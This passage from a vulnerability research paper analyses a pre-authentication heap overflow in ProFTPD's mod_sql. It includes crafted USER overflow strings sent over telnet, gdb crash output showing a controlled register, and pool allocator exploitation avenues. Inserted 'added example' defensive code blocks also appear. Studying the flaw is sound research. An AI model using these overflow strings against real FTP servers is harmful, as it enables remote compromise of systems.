    3.4.1 - Shellcode approach
    3.4.2 - Data manipulation

  4 - Writing an exploit
   4.1 - Exploitation via arbitrary pointer return
   4.2 - Cleanup structure crash
   4.3 - Potential enhancements
   4.4 - Last thoughts

  5 - Discussion of hardening techniques against exploitation
   5.1 - Address Space Layout Randomisation
   5.2 - Non-executable Memory
   5.3 - Position Independent Binaries
   5.4 - Stack Protector
   5.5 - RelRO

  6 - References

--[ 1 - Introduction 

This paper describes and explores a pre-authentication remote root heap
overflow in the ProFTPD [1] FTP server. It's not quite a standard overflow,
due to how the ProFTPD heap works, and how the bug is exploited via
variable substitution.

The vulnerability was inadvertently mitigated (from remote root, at least
:( ) when the ProFTPD developers fixed a separate vulnerability in mod_sql
where you could inject SQL and bypass authentication. That separate
vulnerability, whose fix mitigated this one, is documented in
CVE-2009-0542.

The specific vulnerability we are exploring is an unbounded copy operation 
in sql_prepare_where(), which has not been fixed yet.

Also, I'd like to preemptively apologise for the attached code. It evolved 
over time in piecemeal fashion, and isn't overly pretty/readable by now :p

--[ 2 - The vulnerability

The vulnerability itself is a little contrived, but bear with me:

In contrib/mod_sql.c, _sql_getpasswd(), we have the following code (line 
numbers from ProFTPD 1.3.2rc2):

---
1132   if (!cmap.usercustom) {
1133     where = sql_prepare_where(0, cmd, 2, usrwhere, cmap.userwhere, 
                                   NULL);
1134
1135     mr = _sql_dispatch(_sql_make_cmd(cmd->tmp_pool, 5, "default",
1136       cmap.usrtable, cmap.usrfields, where, "1"), "sql_select");
1137
---

Where usrwhere is in the form of:

(<table name for user column> = 'USERNAME')

Inside of sql_prepare_where() is where all the fun takes place:

---
770 static char *sql_prepare_where(int flags, cmd_rec *cmd, int cnt, ...) {
771   int i, flag, nclauses = 0;
772   int curr_avail;
773   char *buf = "", *res;
774   va_list dummy;
775
776   res = pcalloc(cmd->tmp_pool, SQL_MAX_STMT_LEN);                   [1]
777
778   flag = 0;
779   va_start(dummy, cnt);
780   for (i = 0; i < cnt; i++) {
781     char *clause = va_arg(dummy, char *);
782     if (clause != NULL &&
783         *clause != '\0') {
784       nclauses++;
785
786       if (flag++)
787         buf = pstrcat(cmd->tmp_pool, buf, " AND ", NULL);
788       buf = pstrcat(cmd->tmp_pool, buf, "(", clause, ")", NULL);
789     }
790   }
791   va_end(dummy);
792
793   if (nclauses == 0)
794     return NULL;
795
796   if (!(flags & SQL_PREPARE_WHERE_FL_NO_TAGS)) {                    [2]
797     char *curr, *tmp;
798
799     /* Process variables in WHERE clauses, except any "%{num}" 
    references. */
800     curr = res;
801     curr_avail = SQL_MAX_STMT_LEN;
802
803     for (tmp = buf; *tmp; ) {
804       char *str;
805       modret_t *mr;
806
807       if (*tmp == '%') {
808         char *tag = NULL;
809
810         if (*(++tmp) == '{') {
811           char *query;
812
813           if (*tmp != '\0')
814             query = ++tmp;
815
816           while (*tmp && *tmp != '}')
817             tmp++;
818
819           tag = pstrndup(cmd->tmp_pool, query, (tmp - query));        
820           if (tag) {
821             str = resolve_long_tag(cmd, tag);                       [3]
822             if (!str)
823               str = pstrdup(cmd->tmp_pool, "");
824
825             mr = _sql_dispatch(_sql_make_cmd(cmd->tmp_pool, 2, 
           "default",
826               str), "sql_escapestring");
827             if (check_response(mr) < 0)
828               return NULL;
829
830             sstrcat(curr, mr->data, curr_avail);
831             curr += strlen(mr->data);
832             curr_avail -= strlen(mr->data);
833
834             if (*tmp != '\0')
835               tmp++;
836
837           } else {
838             return NULL;
839           }
840
841         } else {
842           str = resolve_short_tag(cmd, *tmp);                       [4]
843           mr = _sql_dispatch(_sql_make_cmd(cmd->tmp_pool, 2,"default",
844             str), "sql_escapestring");
845           if (check_response(mr) < 0)
846             return NULL;
847
848           sstrcat(curr, mr->data, curr_avail);
849           curr += strlen(mr->data);
850           curr_avail -= strlen(mr->data);
851
852           if (*tmp != '\0')
853             tmp++;
854         }
855
856       } else {                                                      [5]
857         *curr++ = *tmp++;
858         curr_avail--;
859       }
860     }
861     *curr++ = '\0';
862
863   } else {
864     res = buf;
865   }
866
867   return res;
868 }
869
---

At [1], memory is allocated. SQL_MAX_STMT_LEN is defined as 4096 bytes. 
That should be plenty for <300 bytes, right?

At [2], flags are checked to see if "tags" should be expanded. In the case 
we are interested in, tags are expanded.

At [3], we see that "long tags" are expandable, and that they are 
surrounded by %{ and finished with }. We'll ignore them for now. They take 
up too much input space in regards to the output length.

At [4], we see that they have concepts of "short" tags, consisting of one 
byte.

At [5], we see that they have an unbounded one byte copy operation, inside 
of a suitable loop.

Now, we need to cover tags to see what we can do with it:

------[ 2.1 Tags explained

For the path we're interested in, we'll cover "short" tags (longer tags are
not all that interesting, for reasons explained later on).

Looking at resolve_short_tag(), we see the following (heavily snipped for 
brevity):

---
1719 static char *resolve_short_tag(cmd_rec *cmd, char tag) {
1720   char arg[256] = {'\0'}, *argp;
1721
1722   switch (tag) {
1723   case 'A': {
1724       char *pass;
1725
1726       argp = arg;
1727       pass = get_param_ptr(main_server->conf, C_PASS, FALSE);
1728       if (!pass)
1729         pass = "UNKNOWN";
1730
1731       sstrncpy(argp, pass, sizeof(arg));
1732     }
1733     break;
1734
1735   case 'a':
1736     argp = arg;
1737     sstrncpy(argp, 
           pr_netaddr_get_ipstr(pr_netaddr_get_sess_remote_addr()),
1738       sizeof(arg));
1739     break;
1740
...
1914   case 'm':
1915     argp = arg;
1916     sstrncpy(argp, cmd->argv[0], sizeof(arg));
1917     break;
1918
...
1929   case 'r':
1930     argp = arg;
1931     if (strcmp(cmd->argv[0], C_PASS) == 0 &&
1932         session.hide_password)
1933       sstrncpy(argp, C_PASS " (hidden)", sizeof(arg));
1934
1935     else
1936       sstrncpy(argp, get_full_cmd(cmd), sizeof(arg));
1937     break;
1938
...
1954   case 'T':
1955     argp = arg;
1956     if (session.xfer.p) {
...
1974     } else
1975       sstrncpy(argp, "0.0", sizeof(arg));
1976
1977     break;
...
2021
2022   default:
2023     argp = "{UNKNOWN TAG}";
2024     break;
2025   }
2026
2027   return pstrdup(cmd->tmp_pool, argp);
2028 }
2029
---

So, as you can see, tags are a form of variable substitution. %m and %r
allow us to "duplicate" our input, %a allows us to copy our IP address, %T
gives us 0.0 (since we're not transferring anything at the moment), and %Z
(handled by the default case) gives us "{UNKNOWN TAG}".

By combining these, we can generate strings that expand past the allocated 
size in sql_prepare_where, due to the unbounded copy.

Firstly, we'll look at what those inputs would generate, then we'll look at
how to generate suitable overflow strings.

Firstly, the string "AAA%m" once processed would come out looking like:

AAAAAA%m

The string "AAA%m%m" would look like:

AAAAAA%mAAA%m

Unfortunately the string to be expanded isn't as clean as that, it's:

(<name of user entry in table> = 'USER INPUT')\x00

The default of the table field is "userid". Due to the ')\x00 at the end,
we can't do arbitrary off-by-1 or 2 overwrites. It's possible, however,
that \x00 or \x29 could be useful in some situations.

Enough chars / %m's etc would expand past 4096 bytes, and start overwriting
other information stored on the heap. Tags enable exploitation of this
issue via their input duplication. They also have a significant effect on
the heap, for better or worse.

(As a side note, contrib/mod_rewrite.c has %m tag support as well. Since it
seems a little unlikely to hit that pre-auth, it wasn't investigated
further.)
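
The expansion arithmetic and the missing bound from sections 2 and 2.1,
worked through as an added example (not ProFTPD source and not the author's
attached code). It models only %m, %T and unknown tags, leaves out SQL
escaping and long-tag resolution, assumes a clause of the form
"(userid='...')", and checks the remaining space on every write, which the
one byte copy at [5] does not.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define STMT_MAX      4096  /* SQL_MAX_STMT_LEN in the article */
#define USER_MAX      255   /* article: input must be less than 256 bytes */
#define TAG_VALUE_MAX 255   /* resolve_short_tag() copies into char arg[256] */

/* Stand-in for resolve_short_tag(), limited to tags the article walks
 * through. `input` plays the role of cmd->argv[0]; SQL escaping is left out. */
static const char *short_tag_value(char tag, const char *input)
{
    switch (tag) {
    case 'm': return input;            /* %m: the submitted input again */
    case 'T': return "0.0";            /* %T: no transfer in progress   */
    default:  return "{UNKNOWN TAG}";  /* %Z and any other byte         */
    }
}

/* Append n bytes at out[*used] only if they fit together with a final NUL.
 * With out == NULL nothing is written and the bytes are only counted. */
static int append(char *out, size_t outsz, size_t *used, const char *src, size_t n)
{
    if (out != NULL) {
        if (n >= outsz - *used)
            return -1;
        memcpy(out + *used, src, n);
    }
    *used += n;
    return 0;
}

/* Walk a clause the way the loop in sql_prepare_where() does, but with every
 * write bounded. Returns 0 and the expanded length (without NUL) in *len,
 * or -1 when the result would not fit in outsz bytes. */
static int expand_clause(char *out, size_t outsz, const char *clause,
                         const char *input, size_t *len)
{
    size_t used = 0;
    const char *p = clause;

    if (out != NULL && outsz == 0)
        return -1;
    while (*p != '\0') {
        if (*p != '%') {                 /* literal byte, path [5] */
            if (append(out, outsz, &used, p, 1) < 0)
                return -1;
            p++;
            continue;
        }
        p++;                             /* step over '%' */
        if (*p == '{') {                 /* long tag: skipped, adds no bytes here */
            while (*p != '\0' && *p != '}')
                p++;
        } else {                         /* short tag, path [4] */
            const char *val = short_tag_value(*p, input);
            size_t n = strlen(val);
            if (n > TAG_VALUE_MAX)
                n = TAG_VALUE_MAX;
            if (append(out, outsz, &used, val, n) < 0)
                return -1;
        }
        if (*p != '\0')
            p++;
    }
    if (out != NULL)
        out[used] = '\0';
    *len = used;
    return 0;
}

/* Expand "(userid='<user>')". out == NULL measures only; otherwise the copy
 * is bounded by outsz and -1 means the statement was refused. */
int expand_where(char *out, size_t outsz, const char *user, size_t *len)
{
    char clause[USER_MAX + 16];

    if (strlen(user) > USER_MAX)
        return -1;
    snprintf(clause, sizeof(clause), "(userid='%s')", user);
    return expand_clause(out, outsz, clause, user, len);
}

int main(void)
{
    /* Constructed sample: 20 'A' followed by 60 "%m", 140 bytes of input. */
    char out[STMT_MAX], big[USER_MAX + 1] = "AAAAAAAAAAAAAAAAAAAA";
    size_t n = 0;
    int i, rc;

    for (i = 0; i < 60; i++)
        strcat(big, "%m");
    expand_where(NULL, 0, big, &n);
    rc = expand_where(out, sizeof(out), big, &n);
    printf("expands to %zu bytes, bounded copy returns %d\n", n, rc);
    return 0;
}
```

Run in measuring mode over logged USER arguments, the same function flags
any name whose expansion would not fit in SQL_MAX_STMT_LEN.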

------[ 2.2 Generating overflow strings

One initial complication we had in exploring this vulnerability further was
making an overflow string that, once processed, would expand to a suitable
size (as an example, overflow our own arbitrary content 32 bytes past
4096).

We solved this problem by using a constraint solver to generate the
appropriate strings for us, which avoided an otherwise annoying situation:
it is a little messy to calculate how much we need by hand, since touching
one thing can dramatically throw off the rest of the calculations. As an
example, removing one A character would reduce the expanded size by one +
(one * amount_of_%m_tags).

In exploring the vulnerability, we used python-constraint [2].

We used several constraints:

  - Input string must be less than 256 bytes.
  - The parsed string must overflow by exactly X+2 (due to the ') bytes
    added to the end).
  - One/two others that I've forgotten about as I write this up.

We split the strings into "fakeauth" strings, and "trigger" strings. The
fakeauth strings are designed to consume/allocate a certain amount of 
memory, and the trigger strings are designed to overwrite a bunch of bytes 
after the allocation.

Fakeauth strings seem to be required for maximum control of the remote
process, but it's possible they're not required at all.

By mixing the %m's / %a's / %Z's up, it is possible to change memory 
allocation / deallocation order, and thus explore/affect where it crashes.

While the %a tags are useful in experimenting, they are not ideal, as you 
then need to take your local IP address into account when exploiting remote
hosts. 

--[ 3 - Exploring what we can control

------[ 3.1 - Automating tasks

I'm a big fan of automating as much stuff as possible. In order to get a 
ten thousand foot view of what I can do, I used python-ptrace [3] and
pyevolve [4] to:

  - Generate input strings
  - Debug proftpd and record before/after overwriting the memory allocated 
    in sql_prepare_where
  - Analyze how "interesting" the results of input strings were.
    - Process exited? Completely uninteresting. 
    - SEGV'd? 
      - Gather backtraces / register contents / see if the program crashed 
        with our directly controllable user input / etc.

Pyevolve, for the most part, was useful for mutating the input strings to
explore the code paths leading to crashes.

By doing these tasks, I was able to find the more interesting paths that 
could easily be hit, while I was flicking over the ProFTPD pool allocator
... 

------[ 3.2 - ProFTPD Pool allocator

A high level overview for the ProFTPD pool allocator (src/pool.c) is given 
at [5], but here are the quick nuts and bolts of it:

- Pools are allocated, and are subdivided into blocks.

- Pools have cleanup handlers (very useful - used in proftpd-not-pro-enough
  [6] exploit by solar to gain code execution).

- More blocks are malloc()'d if the pool is out of space.

- Memory is never free()'d unless developer mode is enabled, and that's
  only at daemon shut down. 

- In order to allocate memory, the single linked list of free blocks is
  checked to see if the allocation request can be satisfied first without 
  calling malloc().

The pool structure is defined as:

---
196 struct pool {
197   union block_hdr *first;
198   union block_hdr *last;
199   struct cleanup *cleanups;
200   struct pool *sub_pools;
201   struct pool *sub_next;
202   struct pool *sub_prev;
203   struct pool *parent;
204   char *free_first_avail;
205   const char *tag;
206 };
---

The cleanup structure looks like:

---
655 typedef struct cleanup {
656   void *data;
657   void (*plain_cleanup_cb)(void *);
658   void (*child_cleanup_cb)(void *);
659   struct cleanup *next;
660 } cleanup_t;
---

Overwriting a cleanup structure, or a pool structure, would allow us to
arbitrarily execute code when the pool is cleared/destroyed.

The block structure is defined as:

---
46 union block_hdr {
47   union align a;
48
49   /* Padding */
50 #if defined(_LP64) || defined(__LP64__)
51   char pad[32];
52 #endif
53
54   /* Actual header */
55   struct {
56     char *endp;
57     union block_hdr *next;
58     char *first_avail;
59   } h;
60 };
---

Now, we trace pcalloc() as it's called in sql_prepare_where() (and in
numerous places throughout the ProFTPD code), just to see what situations
will allow us to return pointers that we control. Controlling these
returned pointers would allow us to overwrite arbitrary memory, hopefully
with content that we can control.

---
481 void *pcalloc(struct pool *p, int sz) {
482   void *res = palloc(p, sz);
483   memset(res, '\0', sz);
484   return res;
485 }
---

gives us:

---
473 void *palloc(struct pool *p, int sz) {
474   return alloc_pool(p, sz, FALSE);
475 }
---

which in turn gives us:

---
435 static void *alloc_pool(struct pool *p, int reqsz, int exact) {
436
437   /* Round up requested size to an even number of aligned units */
438   int nclicks = 1 + ((reqsz - 1) / CLICK_SZ);
439   int sz = nclicks * CLICK_SZ;
440
441   /* For performance, see if space is available in the most recently
442    * allocated block.
443    */
444
445   union block_hdr *blok = p->last;
446   char *first_avail = blok->h.first_avail;
447   char *new_first_avail;
448
449   if (reqsz <= 0)
450     return NULL;
451
452   new_first_avail = first_avail + sz;
453
454   if (new_first_avail <= blok->h.endp) {                        [1]
455     blok->h.first_avail = new_first_avail;
456     return (void *) first_avail;
457   }
458
459   /* Need a new one that's big enough */
460   pr_alarms_block();
461
462   blok = new_block(sz, exact);                                  [2]
463   p->last->h.next = blok;
464   p->last = blok;
465
466   first_avail = blok->h.first_avail;                            [3]
467   blok->h.first_avail += sz;
468
469   pr_alarms_unblock();
470   return (void *) first_avail;
471 }
---

The check at [1] checks to see if the request can be satisfied from the
pool allocation itself.

The call at [2] requests a "new_block" of memory. The returned pointer is 
determined at [3], indicating that the first_avail pointer at least needs 
to be modified.

---
151 /* Get a new block, from the free list if possible, otherwise malloc a 
       new
152  * one.  minsz is the requested size of the block to be allocated.
153  * If exact is TRUE, then minsz is the exact size of the allocated 
       block;
154  * otherwise, the allocated size will be rounded up from minsz to the 
       nearest
155  * multiple of BLOCK_MINFREE.
156  *
157  * Important: BLOCK ALARMS BEFORE CALLING
158  */
159
160 static union block_hdr *new_block(int minsz, int exact) {
161   union block_hdr **lastptr = &block_freelist;
162   union block_hdr *blok = block_freelist;
163
164   if (!exact) {
165     minsz = 1 + ((minsz - 1) / BLOCK_MINFREE);
166     minsz *= BLOCK_MINFREE;
167   }
168
169   /* Check if we have anything of the requested size on our free list 
         first...
170    */
171   while (blok) {
172     if (minsz <= blok->h.endp - blok->h.first_avail) {
173       *lastptr = blok->h.next;
174       blok->h.next = NULL;
175
176       stat_freehit++;
177       return blok;
178
179     } else {
180       lastptr = &blok->h.next;
181       blok = blok->h.next;
182     }
183   }
184
185   /* Nope...damn.  Have to malloc() a new one. */
186   stat_malloc++;
187   return malloc_block(minsz);
188 }
---

BLOCK_MINFREE is defined to PR_TUNABLE_NEW_POOL_SIZE, which is defined to 
512 bytes. 

So, we can see that if we can get the stars to align correctly, we can gain
code execution via:

  - Pool cleanup/destruction
  - Corrupting the first_avail pointer in a block.

The second method is a little more effort, but it may not be possible to 
hit the first.

There are other avenues potentially available such as unlink() style
corruption, or other heap content overwrites, but they were not explored in
depth. 
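
One way to make the allocator notice a smashed block header before it
trusts first_avail, as an added example (a hypothetical hardening, not
ProFTPD code): the header carries a keyed check word that is verified
before, and recomputed after, every update. The struct name, the check
field, the mixing function and the fixed secret are assumptions made for
this example, and the mix is not a cryptographic MAC.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define CLICK_SZ   8u    /* assumed alignment unit for this model */
#define BLOCK_DATA 64u   /* small data area, enough for the demonstration */

/* The header fields from the article's union block_hdr plus one added
 * field, the check word (hypothetical, not present in ProFTPD). */
struct block {
    char *endp;
    struct block *next;
    char *first_avail;
    uintptr_t check;
};

/* Per-process secret. A real implementation would draw it from the OS random
 * source at start-up; it is fixed here so the example is repeatable. */
static uintptr_t pool_secret = (uintptr_t)0x5bd1e995u;

/* Invertible mixing step, so changing any one field always changes the result. */
static uintptr_t mix(uintptr_t h, uintptr_t v)
{
    h ^= v;
    h *= (uintptr_t)0x9E3779B1u;
    return h ^ (h >> 15);
}

static uintptr_t header_check(const struct block *b)
{
    uintptr_t h = mix(pool_secret, (uintptr_t)b);

    h = mix(h, (uintptr_t)b->endp);
    h = mix(h, (uintptr_t)b->next);
    return mix(h, (uintptr_t)b->first_avail);
}

/* Lay out a fresh block in mem (sizeof(struct block) + BLOCK_DATA bytes). */
struct block *block_init(void *mem)
{
    struct block *b = mem;

    b->first_avail = (char *)(b + 1);
    b->endp = b->first_avail + BLOCK_DATA;
    b->next = NULL;
    b->check = header_check(b);
    return b;
}

/* 1 when the check word matches and first_avail lies inside the block. */
int block_header_ok(const struct block *b)
{
    uintptr_t fa = (uintptr_t)b->first_avail;

    return b->check == header_check(b) &&
           (uintptr_t)(b + 1) <= fa && fa <= (uintptr_t)b->endp;
}

/* Fast path of alloc_pool() ([1] on the page) with the header verified first.
 * NULL means "corrupt header" or "does not fit"; *corrupt says which. */
void *block_alloc_checked(struct block *b, size_t reqsz, int *corrupt)
{
    size_t sz;
    char *res;

    *corrupt = 0;
    if (reqsz == 0 || reqsz > SIZE_MAX - CLICK_SZ)
        return NULL;
    if (!block_header_ok(b)) {
        *corrupt = 1;
        return NULL;
    }
    sz = (1 + (reqsz - 1) / CLICK_SZ) * CLICK_SZ;
    if (sz > (size_t)(b->endp - b->first_avail))
        return NULL;                 /* caller would fetch a new block */
    res = b->first_avail;
    b->first_avail += sz;
    b->check = header_check(b);      /* re-seal after the legitimate update */
    return res;
}

/* Constructed demo: two adjacent blocks in one arena. A copy longer than the
 * first block's data area runs into the second header. 1 = check caught it. */
int demo_detects_overwrite(void)
{
    size_t blk = sizeof(struct block) + BLOCK_DATA;
    unsigned char *arena = malloc(2 * blk);
    struct block *a, *b;
    int corrupt = 0, caught;
    char *buf;

    if (arena == NULL)
        return -1;
    a = block_init(arena);
    b = block_init(arena + blk);
    buf = block_alloc_checked(a, BLOCK_DATA, &corrupt);
    memset(buf, 'A', BLOCK_DATA + sizeof(struct block));  /* simulated overrun */
    caught = block_alloc_checked(b, 16, &corrupt) == NULL && corrupt;
    free(arena);
    return caught;
}

int main(void)
{
    printf("overwrite detected: %d\n", demo_detects_overwrite());
    return 0;
}
```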

------[ 3.3 - Examining backtraces

After leaving the proftpd input fuzzing / automated crash analysis code [7]
running for a while, I decided to stop it and examine some of the
backtraces it created, in order to see what was found, and if any indicated
that they were able to gain direct code execution, or useful memory
corruption.

# echo backtraces: `ls -l backtrace.* | wc -l` ; echo unique backtraces:
  `md5sum backtrace.* | awk '{ print $1 }' | sort | uniq`
backtraces: 4280
unique backtraces: 11380f2c8ce44d29b93b9bc6308692ae
2813d637d735be610a460a75db061f6b 3d10e2a054d8124ab4de5b588c592830
844319188798d7742af43d10f6541a61 914b175392625fe75c2b16dc18bfb250
b975726b4537662f3f5ddf377ea26c20 ccbbd918ad0dbc7a869184dc2eb9cc50
f1bfd5428c97b9d68a4beb6fb8286b70

Some of these backtraces are very similar; the only real change is where
they are called from. However, seeing that the code can be reached from
multiple places is good, as it gives us more chances to take control of the
remote process.

Flicking through the backtraces:

--------[ 3.3.1 - 11380f2c8ce44d29b93b9bc6308692ae backtrace ]

# cat bt_frames.99861.0
EIP: 0xb7b7e67a, EBP: 0xbfd0a0a8, memset
EIP: 0x08055034, EBP: 0xbfd0a0d8, pstrcat
EIP: 0x080c0d85, EBP: 0xbfd0a118, cmd_select
EIP: 0x080c26f2, EBP: 0xbfd0a148, _sql_dispatch
EIP: 0x080c4354, EBP: 0xbfd0a1f8, _sql_getpasswd
EIP: 0x080c514d, EBP: 0xbfd0a2d8, _sql_getgroups
EIP: 0x080ca70e, EBP: 0xbfd0a308, cmd_getgroups
EIP: 0x080718a6, EBP: 0xbfd0a328, call_module
EIP: 0x0807339e, EBP: 0xbfd0a358, dispatch_auth
EIP: 0x0807481d, EBP: 0xbfd0a408, pr_auth_getgroups
EIP: 0x08074a98, EBP: 0xbfd0a438, auth_anonymous_group
EIP: 0x08074ea7, EBP: 0xbfd0a478, pr_auth_get_anon_config
EIP: 0x080a4b5c, EBP: 0xbfd0a4d8, auth_user
EIP: 0x080718a6, EBP: 0xbfd0a4f8, call_module
EIP: 0x0804c651, EBP: 0xbfd0a5a8, _dispatch
EIP: 0x0804caba, EBP: 0xbfd0a5d8, pr_cmd_dispatch
EIP: 0x0804d4ee, EBP: 0xbfd0aa48, cmd_loop
EIP: 0x0804ea36, EBP: 0xbfd0ab88, fork_server
EIP: 0x0804f1cf, EBP: 0xbfd0acf8, daemon_loop
EIP: 0x080522c6, EBP: 0xbfd0ad28, standalone_main
EIP: 0x08053109, EBP: 0xbfd0aea8, main
EIP: 0xb7b1c685, EBP: 0xbfd0af18, __libc_start_main
EIP: 0x0804b841, EBP: 0x00000000, _start

# cat regs.99861.0
EAX: 0x00000000
EBX: 0x0882d654
ECX: 0x0000103c
EDX: 0x00000001
ESI: 0x080d4960
EDI: 0x41346141
EBP: 0xbfd0a0a8
ESP: 0xbfd0a078
EIP: 0xb7b7e67a

So far, we can see we are memset()'ing a controllable pointer :D

Looking further at _sql_getpasswd in the backtrace:

(gdb) l *0x080c4354
0x80c4354 is in _sql_getpasswd (mod_sql.c:1252).
1247      }
1248
1249      if (!cmap.usercustom) {
1250        where = sql_prepare_where(0, cmd, 2, usrwhere, cmap.userwhere, 
                                      NULL);
1251
1252        mr = _sql_dispatch(_sql_make_cmd(cmd->tmp_pool, 5, "default",
1253          cmap.usrtable, cmap.usrfields, where, "1"), "sql_select");
1254
1255        if (check_response(mr) < 0)
1256          return NULL;

(gdb) l *0x080c0d85
0x80c0d85 is in cmd_select (mod_sql_mysql.c:812).
807       } else {
808         query = pstrcat(cmd->tmp_pool, cmd->argv[2], " FROM ", 
                            cmd->argv[1], NULL);
809
810         if (cmd->argc > 3 &&
811             cmd->argv[3])
812           query = pstrcat(cmd->tmp_pool, query, " WHERE ", 
                              cmd->argv[3], NULL);
813
814         if (cmd->argc > 4 &&
815             cmd->argv[4])
816           query = pstrcat(cmd->tmp_pool, query, " LIMIT ", 
                              cmd->argv[4], NULL);

This backtrace is interesting, as it's appending contents we directly 
control to the chunk. Playing further:

# telnet 127.0.0.1 21
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
220 ProFTPD 1.3.1 Server (ProFTPD Default Installation) [127.0.0.1]
USER A%m%m%mA%m%Z%Z%m%m%m%m%Z%mA%m%m%m%mA%m%m%m%m%m%m%m%mA%mA%m%Z%Z%mAA%m%m
%ZA%m%m%m%ZA%m%m%m%Z%m%m%Z%m
331 Password required for A%m%m%mA%m%Z%Z%m%m%m%m%Z%mA%m%m%m%mA%m%m%m%m%m%m%
m%mA%mA%m%Z%Z%mAA%m%m%ZA%m%m%m%ZA%m%m%m%Z%m%m%Z%m
USER AAAAAAAAAA%m%m%mA%m%m%mA%m%mAA%m%m%m%m%mA%m%Z%m%mA%m%mAA%mA%ZAA%m%m%m%
m%m%mA%m%ZAAA%mAa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9
Ac0A

...

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0xb7c7a6b0 (LWP 19840)]
0xb7cf467a in memset () from /lib/tls/i686/cmov/libc.so.6
(gdb) bt
#0  0xb7cf467a in memset () from /lib/tls/i686/cmov/libc.so.6
#1  0x08054d1a in pcalloc (p=0x98a84c4, sz=4156) at pool.c:481
#2  0x08055034 in pstrcat (p=0x98a84c4) at pool.c:580
#3  0x080c0d85 in cmd_select (cmd=0x98a84ec) at mod_sql_mysql.c:812
#4  0x080c26f2 in _sql_dispatch (cmd=0x98a84ec, cmdname=0x80e4a3d 
    "sql_select") at mod_sql.c:393
#5  0x080c4354 in _sql_getpasswd (cmd=0x98a1ad4, p=0xbfa8368c) at 
    mod_sql.c:1252
#6  0x080c514d in _sql_getgroups (cmd=0x98a1ad4) at mod_sql.c:1599
#7  0x080ca70e in cmd_getgroups (cmd=0x98a1ad4) at mod_sql.c:3612
#8  0x080718a6 in call_module (m=0x80ee940, func=0x80ca6bd <cmd_getgroups>,
    cmd=0x98a1ad4) at modules.c:439
#9  0x0807339e in dispatch_auth (cmd=0x98a1ad4, match=0x80d9685 
    "getgroups", m=0x0) at auth.c:89
#10 0x0807481d in pr_auth_getgroups (p=0x98a1a04,
    name=0x9852eec "AAAAAAAAAA%m%m%mA%m%m%mA%m%mAA%m%m%m%m%mA%m%Z%m%mA%m%mA
    A%mA%ZAA%m%m%m%m%m%mA%m%ZAAA%mAa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab
    3Ab4Ab5Ab6Ab7Ab8Ab9Ac0A", group_ids=0x80fb0bc, group_names=0x80fb0c0) 
    at auth.c:691
#11 0x08074a98 in auth_anonymous_group (p=0x98a1a04,
    user=0x9852eec "AAAAAAAAAA%m%m%mA%m%m%mA%m%mAA%m%m%m%m%mA%m%Z%m%mA%m%mA
    A%mA%ZAA%m%m%m%m%m%mA%m%ZAAA%mAa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab
    3Ab4Ab5Ab6Ab7Ab8Ab9Ac0A") at auth.c:751
#12 0x08074ea7 in pr_auth_get_anon_config (p=0x98a1a04, 
    login_name=0xbfa838f8, user_name=0x0, anon_name=0x0) at auth.c:864
#13 0x080a4b5c in auth_user (cmd=0x9852e94) at mod_auth.c:1831
#14 0x080718a6 in call_module (m=0x80ec9e0, func=0x80a4a10 <auth_user>, 
    cmd=0x9852e94) at modules.c:439
#15 0x0804c651 in _dispatch (cmd=0x9852e94, cmd_type=2, validate=1, 
    match=0x9852ee4 "USER") at main.c:424
#16 0x0804caba in pr_cmd_dispatch (cmd=0x9852e94) at main.c:523
#17 0x0804d4ee in cmd_loop (server=0x9853af4, c=0x988abdc) at main.c:750
#18 0x0804ea36 in fork_server (fd=1, l=0x988a7bc, nofork=0 '\0') at 
    main.c:1257
#19 0x0804f1cf in daemon_loop () at main.c:1464
#20 0x080522c6 in standalone_main () at main.c:2294
#21 0x08053109 in main (argc=4, argv=0xbfa84374, envp=0xbfa84388) at 
    main.c:2878
(gdb) i r
eax            0x0      0
ecx            0x103c   4156
edx            0x1      1
ebx            0x98a2444        160048196
esp            0xbfa834a8       0xbfa834a8
ebp            0xbfa834d8       0xbfa834d8
esi            0x80d4960        135088480
edi            0x41346141       1093951809
...
# ruby pattern_offset.rb 0x41346141
12
...
(gdb) frame 2
#2  0x08055034 in pstrcat (p=0x98a84c4) at pool.c:580
580       res = (char *) pcalloc(p, len + 1);
(gdb) info locals
argp = 0x0
res = 0x0
len = 4155
dummy = 0xbfa83524 ...
(gdb) x/32x $esp
0xbfa834e0:     0x098a84c4      0x0000103c      0x00000000      0x00000000
0xbfa834f0:     0x00000000      0x0988b62c      0xbfa83524      0x0000103b
0xbfa83500:     0x00000000      0x00000000      0xbfa83548      0x080c0d85
0xbfa83510:     0x098a84c4      0x098a854c      0x080e40e5      0x098aa7d4
0xbfa83520:     0x00000000      0x080ef060      0x00000000      0x00000000
0xbfa83530:     0x00000000      0x098a854c      0x00000000      0x098a8534
0xbfa83540:     0x0988b62c      0x0988b68c      0xbfa83578      0x080c26f2
0xbfa83550:     0x098a84ec      0x080e441a      0x098aa7d4      0x098a3874
(gdb) x/s  0x098a854c
0x98a854c:       "userid, passwd, uid, gid, homedir, shell FROM ftpuser"
(gdb) x/s  0x080e40e5
0x80e40e5:       " WHERE "
(gdb) x/s  0x098aa7d4
0x98aa7d4:       "(userid='", 'A' <repeats 20 times>, "%m%m%mA%m%m%mA%m%mAA
%m%m%m%m%mA%m%Z%m%mA%m%mAA%mA%ZAA%m%m%m%m%m%mA%m%ZAAA%mAa0Aa1Aa2Aa3Aa4Aa5Aa
6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0", 'A' <repeats 11 times>, 
"%m%m%mA%m%m%mA%m%mAA%m"...

This crash is excellent, but it has several drawbacks:
  - No direct control of EIP, thus requiring overwriting larger chunks of 
    memory which may be problematic.
  - Configuration dependent :(
    - Both SQLUserInfo and SQLGroupInfo specify table names and table 
      entries. For example:
      - SQLUserInfo ftpuser userid passwd uid gid homedir shell
      - SQLGroupInfo ftpgroup groupname gid members
    - We could collect common configurations recommended in guides so that 
      we can take them into account when bruteforcing.. sucky though.

Let's see what the others contain before getting too excited :)

